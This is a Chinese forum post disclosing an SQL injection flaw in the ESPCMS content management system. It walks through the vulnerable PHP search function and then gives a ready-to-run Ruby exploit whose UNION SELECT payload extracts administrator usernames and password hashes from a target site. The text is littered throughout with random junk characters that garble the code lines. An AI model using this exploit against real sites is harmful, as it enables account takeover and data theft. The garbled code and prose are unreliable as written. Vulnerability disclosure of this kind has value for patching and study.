0×0 漏洞概述0×1 漏洞细节" m+ g% y; W8 _) b b6 k6 s9 J
0×2 PoC
% ^8 X* Y& S% P" e! u6 E
- C+ u+ F7 Q" U3 ?
# \/ H% ]/ A9 \. B$ e5 O/ k% o3 V, t) z- ~
0×0 漏洞概述/ v/ O% y) u2 d8 G4 i
# z0 |# _! b. d! Y3 S易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。1 X- D n. F N/ N. q7 u G
其在处理传入的参数时考虑不严谨导致SQL注入发生
* k5 V* t9 s3 d
, w k; h% n! M) {9 a$ u$ F
& V* X: ?) v9 L( I0×1 漏洞细节& l3 B1 h# l' a# Q
. n5 J1 [( h* l H' v: `$ Z
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。7 |7 ?$ F9 X) q
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
1 U0 a/ t$ t- ?1 l; D而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。; w3 t0 G, b- Q
; B" `. q9 p h. ?0 e
在/interface/3gwap_search.php文件的in_result函数中:
" ^8 @8 Y7 Z5 c! [& R7 |# O4 u I
; F( Y$ I# T5 s7 Y! {3 D6 V5 ]) F8 s+ ~# s9 A7 Q) |
6 B. r8 h, w6 V% `
function in_result() {
; m- f# G0 c4 ? ... ... ... ... ... ... ... ... ...7 C( j g$ F' _% }# @+ t! h
$urlcode = $_SERVER[ 'QUERY_STRING '];( J* B2 Y, d- q/ y6 S
parse_str(html_entity_decode($urlcode), $output);# O x2 R; |" \6 K4 M
7 u" V7 B9 Y1 T
... ... ... ... ... ... ... ... ...
/ I! `1 V/ a/ o% N5 {& u+ h if (is_array($output['attr' ]) && count($output['attr']) > 0) {
! V: z5 ~$ Y z$ T% M* g+ [( E7 m Z+ W' Q! ~8 y: a
$db_table = db_prefix . 'model_att';
# h5 ?' k# K( a0 W' o$ O3 B6 k/ x6 t7 K, c5 g% U1 E( ]
foreach ($output['attr' ] as $key => $value) {
( s5 l: y$ p% j7 _. \* F; o if ($value) {4 F/ d: J$ Z9 q, U
2 Q9 g) J7 S m$ I) Y $key = addslashes($key);! E$ J- o% o$ v8 D
$key = $this-> fun->inputcodetrim($key);
; G3 f9 s6 @. X' F/ H/ j $db_att_where = " WHERE isclass=1 AND attrname='$key'";' P. M5 j9 p- @' i% T' s4 k5 N
$countnum = $this->db_numrows($db_table, $db_att_where);
, e$ K/ h' W) x! D' M' [8 s if ($countnum > 0) {
& _7 ^* k- J4 U6 c% @" Q4 I $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;- R7 n, J: T" p' `! {: I
}
& {" c, T+ W0 a3 s, L7 | }
) [( d( c' A, i }
8 F; t* k: @8 w* j- t* v# H5 ^& O }
2 B2 V$ t& \6 j T if (!empty ($keyword) && empty($keyname)) {( |$ h% e1 |+ u
$keyname = 'title';' i- d5 ?" F9 I1 d- U
$db_where.= " AND a.title like '%$keyword%'" ;
" g. ?$ }- u$ n7 D+ \ } elseif (!empty ($keyword) && !empty($keyname)) {
% O3 N$ k( ^, _: N) I $db_where.= " AND $keyname like '% $keyword%'";6 e% n) I- E0 ~; j: A. y# h
}: a) g$ T8 I% ?+ A
$pagemax = 15;3 v# g/ w0 x1 z5 G# B
: s8 h. j* o8 Y& G
$pagesylte = 1;" k7 F' R, ]7 d! s
* e) p9 @5 i+ ?/ s( u
if ($countnum > 0) {
' ^( o! M/ e+ b" R6 K* }3 P
- V, f* Q1 _$ N: S! K2 b% l: G $numpage = ceil($countnum / $pagemax);7 }0 ^! N1 r# H! M5 @+ {4 P
} else {
# C# ~1 h5 ^/ J) s6 a/ z $numpage = 1;2 U0 ]6 r% [/ l! ~* r
}8 E2 @( x8 A8 s, U+ \7 t# p
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
) m( `( q" ^7 K $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);( d, P( g; n9 e# D8 o. g' H4 G; ~( `' v
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);5 u- l, g6 }/ ?0 s" G Y& `$ m
... ... ... ... ... ... ... ... ...5 P4 p2 _) @% f7 g( k
}
) s% e( _; `8 s' o/ X: y7 \8 k. H1 M0 p( `5 x
/ r( P( y7 \" w b6 n
0×2 PoC
! N9 i; {% t) ?6 w4 E+ w9 u, Q* d( F& ?. Y
2 d' p) Z: K# Y- _ [$ L' N9 K8 ]( {& Z! x7 k
require "net/http"
' q3 g* B3 K3 L4 {! H9 T1 `! q1 U
def request(method, url)- @# s. w6 J p* ~5 C% `* m
if method.eql?("get")7 q0 S' |( v5 ?5 K
uri = URI.parse(url)& T0 U" [6 r8 g7 P% Q( Q* h% C# k2 L4 f
http = Net::HTTP.new(uri.host, uri.port)$ o; P( q! v# d4 C$ @4 z. ~1 \
response = http.request(Net::HTTP::Get.new(uri.request_uri))
5 V) a5 n: h- n return response1 ]# I2 V% a2 {! b! T
end* U3 H0 F5 V3 s* D- p4 E; |6 Y
end" ~+ H; }7 i$ B& V. p' x" p( T
0 b- G. U9 p4 z7 \, }* y) P. f# Jdoc =<<HERE
( _) C: T9 ]! N-------------------------------------------------------
( `; c5 z% \# m. v) g) K9 s0 tEspcms Injection Exploit1 ` W" h& a/ y8 w+ n
Author:ztz
) v; L7 N( [1 Y U% b- h8 c% ~Blog:http://ztz.fuzzexp.org/
% F. P7 D/ A" S+ T3 y! J-------------------------------------------------------
% B. N. T4 Q7 P5 G( S2 i, {$ E; U: q/ o) e9 `. a) N( l
HERE
' b! N: @4 w5 ?" \4 N/ ~7 X2 y9 y; f
( p$ k! [& ~, @2 I( O& _& T. uusage =<<HERE
0 Z" G c( K3 l7 R1 v8 HUsage: ruby #{$0} host port path
% A' Z( W6 r0 S3 J( E$ T$ ^example: ruby #{$0} www.target.com 80 /
, H; p9 z$ s" kHERE6 l! K6 _8 J! k; T/ Z- @; {5 o7 f
* s/ D, M' ^1 T% h
puts doc2 I! g) c8 B: i3 v- p, a% M
if ARGV.length < 3
3 ?1 G7 y' Y5 A9 l; n puts usage$ w U% p6 t0 V8 j( n: l: s+ M
else0 r7 R. ?0 p$ U+ h, s/ y9 Y6 o; H
$host = ARGV[0]; e& _% _' T8 i/ D* _4 |
$port = ARGV[1]. l6 @# [+ \5 f" `! R3 U* R6 {/ v
$path = ARGV[2]% B, {# m+ o" F9 g+ c6 [
( |$ [. c1 R |9 N puts "send request..."! b: R, F N& \9 a6 `
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&3 B+ ^# x: m" Y9 Y4 j4 S
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
7 D0 ]1 e2 w1 ]9 |,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27% H j5 s/ g* {6 v8 O3 m
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
W3 ]% ]- O6 T+ p, N$ ]2 [ response = request("get", url)0 C5 {: S9 g. i, L- n' P
result = response.body.scan(/\w+&\w{32}/)
1 x+ O4 t) B1 Y. m1 a* r( D puts result
: K4 q, K5 \! f+ n! Aend
) a" s/ h/ @$ U. }- ?" h
" t H/ L2 a' x; ^% V* n3 u |
发表于 2013-7-27 18:31:52
收藏
支持
反对